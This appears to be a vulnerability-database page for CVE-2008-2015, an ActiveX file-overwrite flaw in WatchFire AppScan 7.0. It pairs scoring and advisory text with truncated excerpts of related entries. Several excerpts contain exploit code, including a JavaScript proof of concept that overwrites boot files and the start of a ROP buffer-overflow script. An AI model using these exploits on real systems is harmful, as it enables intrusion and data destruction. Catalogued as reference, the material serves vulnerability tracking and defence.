CVE-2008-2015
published 2008-04-30CVE-2008-2015: Multiple absolute path traversal vulnerabilities in certain ActiveX controls in WatchFire AppScan 7.0 allow remote attackers to create or overwrite arbitrary…
PriorityP346critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
8.33%
94.2th percentile
Multiple absolute path traversal vulnerabilities in certain ActiveX controls in WatchFire AppScan 7.0 allow remote attackers to create or overwrite arbitrary files via a full pathname in the argument to the (1) CompactSave and (2) SaveSession method in one control, and the (3) saveRecordedExploreToFile method in a different control. NOTE: this can be leveraged for code execution by writing to a Startup folder.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| watchfire | appscan | — | — |
CVSS provenance
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vendor_redhat9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-89pq-qvjv-f582: Multiple absolute path traversal vulnerabilities in certain ActiveX controls in WatchFire AppScan 7
ghsa_unreviewed·2022-05-01
CVE-2008-2015 [HIGH] CWE-22 GHSA-89pq-qvjv-f582: Multiple absolute path traversal vulnerabilities in certain ActiveX controls in WatchFire AppScan 7
Multiple absolute path traversal vulnerabilities in certain ActiveX controls in WatchFire AppScan 7.0 allow remote attackers to create or overwrite arbitrary files via a full pathname in the argument to the (1) CompactSave and (2) SaveSession method in one control, and the (3) saveRecordedExploreToFile method in a different control. NOTE: this can be leveraged for code execution by writing to a Startup folder.
Kernel
namei: allow restricted O_CREAT of FIFOs and regular files
kernel_security·2018-08-23·CVSS 7.2
CVE-2000-1134 [HIGH] namei: allow restricted O_CREAT of FIFOs and regular files
namei: allow restricted O_CREAT of FIFOs and regular files
Disallows open of FIFOs or regular files not owned by the user in world
writable sticky directories, unless the owner is the same as that of the
directory or the file is opened without the O_CREAT flag. The purpose
is to make data spoofing attacks harder. This protection can be turned
on and off separately for FIFOs and regular files via sysctl, just like
the symlinks/hardlinks protection. This patch is based on Openwall's
"HARDEN_FIFO" feature by Solar Designer.
This is a brief list of old vulnerabilities that could have been prevented
by this feature, some of them even allow for privilege escalation:
CVE-2000-1134
CVE-2007-3852
CVE-2008-0525
CVE-2009-0416
CVE-2011-4834
CVE-2015-1838
CVE-2015-7442
CVE-2016-7489
This list is no
Red Hat
jasper: integer overflow in the jas_matrix_create() function
vendor_redhat·2015-12-24·CVSS 9.3
CVE-2015-8751 [CRITICAL] CWE-190 jasper: integer overflow in the jas_matrix_create() function
jasper: integer overflow in the jas_matrix_create() function
Integer overflow in the jas_matrix_create function in JasPer allows context-dependent attackers to have unspecified impact via a crafted JPEG 2000 image, related to integer multiplication for memory allocation.
Statement: This issue did not affect the versions of jasper as shipped with Red Hat Enterprise Linux 6 and 7 as it was already fixed via CVE-2008-3520.
Package: netpbm (Red Hat Enterprise Linux 5) - Not affected
Package: jasper (Red Hat Enterprise Linux 6) - Not affected
Package: jasper (Red Hat Enterprise Linux 7) - Not affected
Package: mingw-virt-viewer (Red Hat Enterprise Virtualization 3) - Not affected
No detection rules found.
Exploit-DB
Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass (MS15-014)
exploitdb·2019-10-29·CVSS 3.3
CVE-2015-0009 [LOW] Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass (MS15-014)
Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass (MS15-014)
---
# Exploit Title: Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass
# Date: 2019-10-28
# Exploit Author: Thomas Zuk
# Version: Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2,
# Windows 8, Windows Server 2012, Windows RT, Windows 8.1, Windows Server 2012 R2, and Windows RT 8.1
# Tested on: Windows 7 , Windows Server 2012
# CVE : CVE-2015-0009
# Type: Remote
# Platform: Windows
# Description: This exploit code targets vulnerable systems in order to corrupt GPO updates which causes
# the target system to revert various security settings to their default settings. This includes SMB server
# and network client settings, which by default do not
Exploit-DB
Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution (MS15-011)
exploitdb·2019-10-29·CVSS 8.3
CVE-2015-0008 [HIGH] Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution (MS15-011)
Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution (MS15-011)
---
# Exploit Title: Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution
# Date: 2019-10-28
# Exploit Author: Thomas Zuk
# Version: Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012,
# Windows RT, Windows 8.1, Windows Server 2012 R2, and Windows RT 8.1
# Tested on: Windows 7 , Windows Server 2012
# CVE : CVE-2015-0008
# Type: Remote
# Platform: Windows
# Description: While there exists multiple advisories for the vulnerability and video demos of
# successful exploitation there is no public exploit-code for MS15-011 (CVE-2015-0008). This exploit code
# targets vulnerable systems in order to modify registry keys to disabl
Exploit-DB
ActiveState Perl.exe x64 Client 5.20.2 - Crash (PoC)
exploitdb·2015-09-06
ActiveState Perl.exe x64 Client 5.20.2 - Crash (PoC)
ActiveState Perl.exe x64 Client 5.20.2 - Crash (PoC)
---
# Exploit Title: [ActiveState] Perl.exe x64 Client Denial of Service (v5.20.2)
# Date: 9-3-2015
# Software Link: http://www.activestate.com/activeperl/downloads/thank-you?dl=http://downloads.activestate.com/ActivePerl/releases/5.20.2.2002/ActivePerl-5.20.2.2002-MSWin32-x64-299195.msi
# Exploit Author: Robbie Corley
# Contact: [email protected]
# Website:
# Target(s): Windows 7, Server 2008, server 2012, Windows 8.1, Windows 10
# CVE:
# Category: Denial of Service Exploits
#
# Description:
# A Denial of Service can be achieved by concatenating several large strings together and attempting to write to file.
my $buff = "\x41" x 7000;
my $endofbuff = "\x42" x 5860;
open(myfile,'>orgsched.ocf'); # file extension is irrelevant
pri
Exploit-DB
Microsoft Word - Local Machine Zone Code Execution (MS15-022)
exploitdb·2015-07-20·CVSS 9.3
CVE-2015-0097 [CRITICAL] Microsoft Word - Local Machine Zone Code Execution (MS15-022)
Microsoft Word - Local Machine Zone Code Execution (MS15-022)
---
Exploit Title: Microsoft Word Local Machine Zone Remote Code Execution Vulnerability
Date: July 15th, 2015
Exploit Author: Eduardo Braun Prado
Vendor Homepage : http://www.microsoft.com
Version: 2007
Tested on: Microsoft Windows XP, 2003, Vista, 2008, 7, 8, 8.1
CVE: CVE-2015-0097
Original Advisory: https://technet.microsoft.com/library/security/ms15-022
Microsoft Word, Excel and Powerpoint 2007 contains a remote code execution vulnerability because it is possible
to reference documents such as Works document (.wps) as HTML. It will process HTML and script code in the context
of the local machine zone of Internet Explorer which leads to arbitrary code execution.
By persuading users into opening eg. specially crafted .WPS,
Exploit-DB
Microsoft Windows - ClientCopyImage Win32k (MS15-051) (Metasploit)
exploitdb·2015-06-24·CVSS 7.8
CVE-2015-1701 [HIGH] Microsoft Windows - ClientCopyImage Win32k (MS15-051) (Metasploit)
Microsoft Windows - ClientCopyImage Win32k (MS15-051) (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'rex'
class Metasploit3 'Windows ClientCopyImage Win32k Exploit',
'Description' => %q{
This module exploits improper object handling in the win32k.sys kernel mode driver.
This module has been tested on vulnerable builds of Windows 7 x64 and x86, and
Windows 2008 R2 SP1 x64.
},
'License' => MSF_LICENSE,
'Author' => [
'Unknown', # vulnerability discovery and exploit in the wild
'hfirefox', # Code released on github
'OJ Reeves' # msf module
],
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
'Platform' => 'win',
'
Exploit-DB
BulletProof FTP Client 2010 - Local Buffer Overflow (DEP Bypass)
exploitdb·2015-05-18·CVSS 9.3
CVE-2008-5753 [CRITICAL] BulletProof FTP Client 2010 - Local Buffer Overflow (DEP Bypass)
BulletProof FTP Client 2010 - Local Buffer Overflow (DEP Bypass)
---
#-----------------------------------------------------------------------------#
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) #
# Date: Feb 15 2015 #
# Exploit Author: Gabor Seljan #
# Software Link: http://www.bpftp.com/ #
# Version: 2010.75.0.76 #
# Tested on: Windows XP SP3 English #
# Credits: His0k4 #
# CVE: CVE-2008-5753 #
#-----------------------------------------------------------------------------#
#!/usr/bin/python
from struct import pack
# offset to SEH is 93 byte
buf = b'A' * 13
buf += pack('<L',0x77c1f62f) # POP ECX # POP ECX # POP EDI # POP EBX # POP EBP # RETN [msvcrt.dll]
buf += b'A' * 20
buf += pack('<L',0x74c86a99) # POP ESI # RETN [oleacc.dll]
buf += b'A' * 4
buf += pack('<L'
Exploit-DB
FastStone Image Viewer 5.3 - '.tga' Crash (PoC)
exploitdb·2015-03-19
FastStone Image Viewer 5.3 - '.tga' Crash (PoC)
FastStone Image Viewer 5.3 - '.tga' Crash (PoC)
---
# Exploit Title : FastStoneImage Viewer (Corrupted tga) IMAGESPECIFICATION.Width Crash POC
# Product : FastStoneImage Viewer
# Date : 25.02.2015
# Exploit Author : ITDefensor Vulnerability Research Team http://itdefensor.ru/
# Software Link : http://www.faststone.org/FSViewerDownload.htm
# Vulnerable version : 5.3 (Latest at the moment) and probably previous versions
# Vendor Homepage : http://www.faststone.org/
# Tested on : FastStoneImage Viewer 5.3 installed on Windows 7 x64, Windows Server 2008
# CVE : unknown at the moment
#============================================================================================
# Open created POC file (poc.tga) with FastStoneImage Viewer
# Details
#*** ERROR: Module load completed but symbols c
Exploit-DB
Intel Network Adapter Diagnostic Driver - IOCTL Handling
exploitdb·2015-03-14·CVSS 7.8
CVE-2015-2291 [HIGH] Intel Network Adapter Diagnostic Driver - IOCTL Handling
Intel Network Adapter Diagnostic Driver - IOCTL Handling
---
/*
Intel Network Adapter Diagnostic Driver IOCTL Handling Vulnerability
Vendor: Intel
Product webpage: http://www.intel.com
Affected product(s):
Network Adapter Driver for Windows XP
Network Adapter Driver for Windows 7
Network Adapter Driver for Windows 8
Network Adapter Driver for Windows 2008/R2
Network Adapter Driver for Windows 2012/R2
Affected version(s):
Intel(R) iQVW64.SYS v1.03.0.7
Intel(R) iQVW32.SYS v1.03.0.7
Tested Operating systems:
Windows XP SP3 (32-bit)
Windows 7 SP1 (32/64-bit)
Date: 14/03/2015
Credits: Glafkos Charalambous
CVE: CVE-2015-2291
Disclosure Timeline:
10-06-2014: Vendor Notification
21-06-2014: Vendor Response/Feedback
08-08-2014: Vendor Response/Feedback
26-08-2014: Requesting Status/No Vendor Re
Exploit-DB
Persistent Systems Client Automation - Command Injection Remote Code Execution (Metasploit)
exploitdb·2015-02-27·CVSS 10.0
CVE-2015-1497 [CRITICAL] Persistent Systems Client Automation - Command Injection Remote Code Execution (Metasploit)
Persistent Systems Client Automation - Command Injection Remote Code Execution (Metasploit)
---
# Exploit Title: Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability
# Date: 2014-10-01
# Exploit Author: Ben Turner
# Vendor Homepage: Previosuly HP, now http://www.persistentsys.com/
# Version: 7.9, 8.1, 9.0, 9.1
# Tested on: Windows XP, Windows 7, Server 2003 and Server 2008
# CVE-2015-1497
# CVSS: 10
require 'msf/core'
class Metasploit3 'Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability',
'Description' => %Q{
This module exploits PS Client Automation, by sending a remote service install and creating a callback payload.
},
'Author' => [ 'Ben Turner'
Exploit-DB
SkinCrafter3 vs2005 3.8.1.0 - Multiple ActiveX Buffer Overflows
exploitdb·2015-01-05
CVE-2012-2271 SkinCrafter3 vs2005 3.8.1.0 - Multiple ActiveX Buffer Overflows
SkinCrafter3 vs2005 3.8.1.0 - Multiple ActiveX Buffer Overflows
---
ActiveX Buffer Overflow in SkinCrafter3_vs2005
Affected version=3.8.1.0
Vendor Homepage:http://skincrafter.com/
Software Link:skincrafter.com/downloads/SkinCrafter_Demo_2005_2008_x86.zip
The vulnerability lies in the COM component used by the product SkinCrafter3_vs2005.dll.
Description: Skin Crafter is a software that is used to create custom skins for different windows applications.
SkinCrafter is compatible with Windows XP / Vista / 7 / 8 and earlier versions.
Vulnerability tested on Windows Xp Sp3 (EN),with IE6
Author: metacom
Vulnerability discovered:04.01.2015
junk1 = "";
while(junk1.length
################################################################################
ActiveX Buffer Overflow in SkinCrafter
Exploit-DB
Watchfire Appscan 7.0 - ActiveX Multiple Insecure Methods
exploitdb·2008-04-25
CVE-2008-2015 Watchfire Appscan 7.0 - ActiveX Multiple Insecure Methods
Watchfire Appscan 7.0 - ActiveX Multiple Insecure Methods
---
Multiple Insecure Methods in AppScan Watchfire Web Application Security v 7.0
Remote: Yes
An arbitrary file overwrite has been discovered in an ActiveX control installed with the WatchFire Appscan v 7.0.
by callAX -> Fr33d0m & Kn0wl3dg3 1s th3 r341 P0w3r
function Do_it()
{
File = "c:\\autoexec_.bat"
ctrl.CompactSave(File)
}
function Do_it()
{
File = "c:\\boot_.ini"
ctrl.saveRecordedExploreToFile(File)
}
function Do_it()
{
File = "c:\\ntldr_"
ctrl.SaveSession(File)
}
# milw0rm.com [2008-04-25]
Nuclei
Microsoft Windows 'HTTP.sys' - Remote Code Execution
nuclei·CVSS 9.8
CVE-2015-1635 [CRITICAL] Microsoft Windows 'HTTP.sys' - Remote Code Execution
Microsoft Windows 'HTTP.sys' - Remote Code Execution
HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka "HTTP.sys Remote Code Execution Vulnerability."
Template:
id: CVE-2015-1635
info:
name: Microsoft Windows 'HTTP.sys' - Remote Code Execution
author: Phillipo
severity: critical
description: |
HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka "HTTP.sys Remote Code Execution Vulnerability."
impact: |
Attackers can execute arbitrary code remotely on Windows servers running vulnerab
No writeups or analysis indexed.
http://www.securityfocus.com/bid/28940http://www.securitytracker.com/id?1019948https://exchange.xforce.ibmcloud.com/vulnerabilities/42077https://www.exploit-db.com/exploits/5496http://www.securityfocus.com/bid/28940http://www.securitytracker.com/id?1019948https://exchange.xforce.ibmcloud.com/vulnerabilities/42077https://www.exploit-db.com/exploits/5496
2008-04-30
Published